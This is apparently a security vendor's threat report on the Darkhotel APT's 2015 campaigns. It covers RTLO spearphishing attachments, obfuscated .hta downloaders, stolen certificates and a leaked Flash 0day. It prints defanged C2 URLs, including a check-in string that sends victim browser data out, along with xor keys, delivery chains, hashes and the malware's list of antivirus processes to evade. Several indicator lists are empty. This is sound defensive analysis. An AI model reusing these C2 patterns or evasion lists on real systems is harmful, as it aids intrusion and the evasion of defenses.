Darkhotel APT attacks dated 2014 and earlier are characterized by the misuse of stolen certificates, the deployment of .hta files with multiple techniques, and the use of unusual methods like the infiltration of hotel Wi-Fi to place backdoors in targets’ systems. In 2015, many of these techniques and activities remain in use. However, in addition to new variants of malicious .hta, we find new victims, .rar attachments with RTLO spearphishing, and the deployment of a 0day from Hacking Team.
The Darkhotel APT continues to spearphish targets around the world, with a wider geographic reach than its previous botnet buildout and hotel Wi-Fi attacks. Some of the targets are diplomatic or have strategic commercial interests.
The location of Darkhotel’s targets and victims in 2015:
- North Korea
- South Korea
2015 Darkhotel .hta and backdoor-related, exploit-related and c2 sites:
2015 spearphishing incident attachment name subset:
- schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
- schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
- congratulation.rar -> congratulation_?gpj.scr
- letter.rar -> letter_?gpj.scr
Consistent use of obfuscated .hta downloaders
Whether the infection is achieved through spearphishing, physical access to a system or the Hacking Team Flash 0day, there frequently seems to be a common method for a newly-infected system to communicate with Darkhotel’s c2:
It is interesting that this particular group has for years now deployed backdoor and downloader code in the form of .hta files. In 2010, we observed it re-purposing articles on North Korea by the US think-tank, Brookings Institute, in order to attack North Korean-related targets with malicious code buried in .hta files. It also emailed links to its malicious .hta files to North Korean tourist groups, economists with an interest in North Korea, and more. It’s somewhat strange to see such heavy reliance on older Windows-specific technology like HTML applications, introduced by Microsoft in 1999.
From the recent sendspace[.]servermsys[.]com/downloader.hta:
After execution and escaping a couple of variables, the .hta uses ancient Adodb.stream components in order to write out a string xor’d with 0x3d as an executable file and runs it.
This code results in the execution of “internet_explorer_Smart_recovery.exe” 054471f7e168e016c565412227acfe7f, and a hidden browser window phoning back to its c2. In this case, it seems that Darkhotel operators are checking as to whether or not the victim’s default browser is Internet Explorer, as all versions of IE return the value “0” and other browsers leave “appMinorVersion” undefined. This data collection seems somewhat odd, because .hta files are supported and run by mshta.exe on Windows systems only, still delivered with Windows 8. Perhaps it is an artefact from early development of the code. Here is a recent version:
“hxxp://sendspace[.]servermsys[.]com/readme.php?type=execution&result=created_and_executed&info=” + navigator.appMinorVersion + “
The “internet_explorer_Smart_recovery.exe” file is a simple obfuscated downloader. A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports.
When finished, this url string decryption and connectback looks like
http://sendspace[.]servermsys[.]com/wnctprx. The file is downloaded (b1f56a54309147b07dda54623fecbb89) to “.tmp” file in %temp%, executed, and the downloader exits. This larger file is a backdoor/downloader that includes ssh functionality, and drops its keys to disk for ssh interaction. We find older Darkhotel information stealers dropped and run on the system by these downloaders.
Spearphishing and .rar Attachments with RTLO
The Darkhotel APT will relentlessly spearphish specific targets in order to successfully compromise systems. Some targets are spearphished repeatedly with much the same social-engineering schemes. For example, the attachment “schedule(2.11~16).rar” could be sent on February 10th, with Darkhotel returning to the same targets in late May for a second attempt with attachment “schedule(6.1~6).rar”.
It consistently archives RTLO .scr executable files with in .rar archives, in order to appear to the target as innocuous .jpg files. These executable files are lite droppers, maintaining these decoy jpeg files, and code to create an lnk downloader.
When the target attempts to open what they think is a jpg image file, the executable code runs and drops a jpg image to disk, then opens it with mspaint.exe in the background. This “congratulations” document is in Korean, revealing a likely characteristic of the intended target.
While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. This technique is also used by other APTs as persistence mechanisms, as documented by our Mandiant colleagues. The 64kb lnk file is downloader code:
When this lnk file is executed, it begins an AJAX-based download process for the “unzip.js” file (a07124b65a76ee7d721d746fd8047066) on openofficev.info. This is another wscript file implementing AJAX to download and execute a relatively large compiled executable:
This executable code is saved to %temp%\csrtsrm.exe and executed there. It is a relatively large executable (~1.2 mb) that injects malicious code and spawns remote threads into legitimate processes.
Stolen certificates and evasion
The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co. Ltd.
Darkhotel now tends to hide its code behind layers of encryption. It is likely that it has slowly adapted to attacking better-defended environments and prefers not to burn these stolen digital certificates. In previous attacks it would simply have taken advantage of a long list of weakly implemented, broken certificates.
Not only are its obfuscation techniques becoming stronger, but its anti-detection technology list is growing. For example, this signed downloader (d896ebfc819741e0a97c651de1d15fec) decrypts a set of anti-malware strings in stages to identify defensive technologies on a newly-infected system, and then opens each process, looking for a matching image name:
c:\avast! sandbox\WINDOWS\system32\kernel32.dll – Avast!
avp.exe – Kaspersky Lab
mcagent.exe;mcuicnt.exe – Intel/Mcafee
bdagent.exe – BitDefender
ravmon.exe,ravmond.exe – Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe – Qihoo 360
ayagent.aye,avguard.;avgntsd.exe – Avira Antivirus
ccsvchst.exe,nis.exe – Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe – Avast!
msseces.exe;msmpeng.exe – Microsoft Security Essentials and Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe – G-Data
avas.exe – TrustPort AV
tptray.exe – Toshiba utility
fsma32.exe;fsorsp.exe – F-Secure
econser.exe;escanmon.exe – Microworld Technologies eScan
SrvLoad.exe;PSHost.exe – Panda Software
egui.exe;ekrn.exe – ESET Smart Security
pctsSvc.exe;pctsGui.exe – PC Tools Spyware Doctor
casc.exe;UmxEngine.exe – CA Security Center
cmdagent.exe;cfp.exe – Comodo
KVSrvXP.exe;KVMonXP.exe – Jiangmin Antivirus
nsesvc.exe;CClaw.exe – Norman
V3Svc.exe – Ahnlab
guardxup. – IKARUS
FProtTray. – F-Prot
op_mon – Agnitum Outpost
vba332ldr.;dwengine. – DrWeb
Even the identifying information that the backdoor seeks from a system is not decrypted until runtime. Like the “information-stealer” component documented in our previous Darkhotel technical report, this component seeks to steal a set of data with which to identify the infected system. Much of the information is collected with the same set of calls, i.e. kernel32.GetDefaultSystemLangID, kernel32.GetVersion, and kernel32.GetSystemInfo:
- Default system codepage
- Network adapter information
- Processor architecture
- Hostname and IP address
- Windows OS and Service Pack versions
Essentially, much of this information-stealer code is the same as that observed in previous attacks.
Tisone360.com, Visits, and Hacking Team Flash 0day
The tisone360.com site was especially interesting to us. In April 2015, Darkhotel was email-phishing with links to earlier (cve-2014) Flash exploits, and then, at the beginning of July, it began to distribute what is reported to be a leaked Hacking Team Flash 0day.
It looks like the Darkhotel APT may have been using the leaked HackingTeam Flash 0day to target specific systems. We can pivot from “tisone360.com” to identify some of this activity. The site was up and active as late as 22 July, 2015. However, this looks to be a small part of its activity. In addition to the icon.swf HT 0day (214709aa7c5e4e8b60759a175737bb2b), it looks as though the “tisone360.com” site was delivering a Flash CVE-2014-0497 exploit in April. We reported the related vulnerability to Adobe in January 2014, when it was being used by the Darkhotel APT.
Recently, the Darkhotel APT has maintained multiple working directories on this site.
It is the ims2 directory that is the most active. It contains a set of backdoors and exploits. The most interesting of these is the reported Hacking Team Flash 0day, icon.swf. In the days following the public mention of this server, the crew slowly tightened down open access to /ims2/. Either way, the contents continued to be actively used.
icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
-> %temp%\RealTemp.exe (61cc019c3141281073181c4ef1f4e524)
After icon.jpg is downloaded by the flash exploit, it is decoded with a multi-byte xor key 0xb369195a02. It then downloads further components.
It’s interesting to note that the group appears to be altering the compilation and linker timestamps of its executable code to dates in 2013. We see this across multiple samples deployed and observed for the first time in mid-2015, including the icon.jpg downloader.
A log of visits to the site directory records that the directory was set up on July 8th. A handful of visits to a specific url on the server from five systems based in the following locations were recorded on the 8th and 9th. Several of these are likely to be Darkhotel APT targets:
- South Korea
- China (likely to be research)
However, one of those systems hammered the site on the 9th, visiting almost 12,000 times in 30 minutes. This volume of traffic is likely to represent a noisy scanning research attempt and not someone DoS’ing the site:
Recorded site visits following the 9th are likely to be unreliable and may be more researchers, responding to the growing notoriety of the site following the public reports on the 9th. Many of these approximately 50 visits come from a subset of the above systems and are repeated multiple times. Visits from the following locations occurred on or after the 10th:
- Germany (likely to be research)
- Ukraine (likely to be research)
- Amazon Web Services, multiple locations (likely to be research)
- Googlebot, multiple locations
- Ireland (likely to be research)
- France (likely to be research)
- Czech Republic
A consistent attack flow
The Darkhotel group tends to stick with what works. For example, for years we saw repeated use of spearphishing targets directly with .hta files. Now, as with the tisone360.com site above, we have seen repeated use in 2015 of a creative chain of delivery sets.
downloader -> hta checkin -> info stealer -> more compiled components.
dropper -> wsh script -> wsh script -> info stealer -> more compiled components
spearphish -> dropper -> hta checkin -> downloader -> info stealer
While a chain of delivery that includes obfuscated scripts within .hta files occurred as far back as 2011, the volume appears to have picked up in 2014 and now 2015.
Hiding infrastructure in plain sight
The group is now more vigilant in maintaining its sites, tightening up configuration and response content. Right now, its c2 responds with anti-hero images of “Drinky Crow” from the alt Maakies cartoon:
Other Darkhotel c2s tend to blend in with random sites on the web when incorrect or missing pages are visited. They are ripping images either from FOTOLIA or articles on artisanal ice cream makers here:
Spearphish attachments md5:
39562e410bc3fb5a30aca8162b20bdd0 (first seen late 2014, used into 2015)
e85e0365b6f77cc2e9862f987b152a89 (first seen late 2014, used into 2015)
2015 large downloader md5:
Infostealers dropped in 2015
Subhosts and urls:
Parallel and Previous Research
Read more about how you can protect your company against the Darkhotel threat actor here.